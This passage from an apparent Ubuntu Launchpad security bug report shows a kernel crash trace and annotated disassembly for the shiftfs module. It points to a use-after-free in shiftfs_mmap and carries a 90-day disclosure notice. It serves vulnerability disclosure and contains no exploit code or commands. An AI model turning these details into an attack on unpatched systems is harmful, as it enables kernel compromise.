[ 72.237681] Modules linked in: shiftfs intel_rapl_msr snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi intel_rapl_common crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel aes_x86_64 crypto_simd snd_seq cryptd glue_helper joydev input_leds serio_raw snd_seq_device snd_timer snd qxl ttm soundcore qemu_fw_cfg drm_kms_helper drm fb_sys_fops syscopyarea sysfillrect sysimgblt mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover failover ahci psmouse lpc_ich i2c_i801 libahci virtio_blk
[ 72.257673] ---[ end trace 5d85e7b7b0bae5f5 ]---
[ 72.259237] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 72.260990] Code: 8b e0 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 72.269615] RSP: 0018:ffffc1490061bd40 EFLAGS: 00010202
[ 72.271414] RAX: 6b6b6b6b6b6b6b6b RBX: ffff9c1cf1ae5788 RCX: 7800000000000000
[ 72.273893] RDX: 8000000000000025 RSI: ffff9c1cf14bfdc8 RDI: ffff9c1cc48b5900
[ 72.276354] RBP: ffffc1490061bd60 R08: ffff9c1cf14bfdc8 R09: 0000000000000000
[ 72.278796] R10: ffff9c1cf1ae5768 R11: 00007faa3eddb000 R12: ffff9c1cf1ae5790
[ 72.281095] R13: ffff9c1cc48b7740 R14: ffff9c1cf14bfdc8 R15: ffff9c1cf7209740
[ 72.284048] FS: 00007faa3ed9e540(0000) GS:ffff9c1cfbb00000(0000) knlGS:0000000000000000
[ 72.287161] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 72.289164] CR2: 0000558ad728d3e0 CR3: 0000000144804003 CR4: 0000000000360ee0
[ 72.291953] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 72.294487] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
==================================================================
Faulting code:
0000000F 55 push rbp
00000010 4889E5 mov rbp,rsp
00000013 4157 push r15
00000015 4156 push r14
00000017 4155 push r13
00000019 4154 push r12
0000001B 488B87C8000000 mov rax,[rdi+0xc8]
00000022 4C8B6810 mov r13,[rax+0x10]
00000026 498B4528 mov rax,[r13+0x28]
0000002A 4883786000 cmp qword [rax+0x60],byte +0x0 <<<< GPF HERE
0000002F 0F8497000000 jz near 0xcc
00000035 4989FC mov r12,rdi
00000038 4989F6 mov r14,rsi
As you can see, the poison value 6b6b6b6b6b6b6b6b is being dereferenced.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1850994/+subscriptions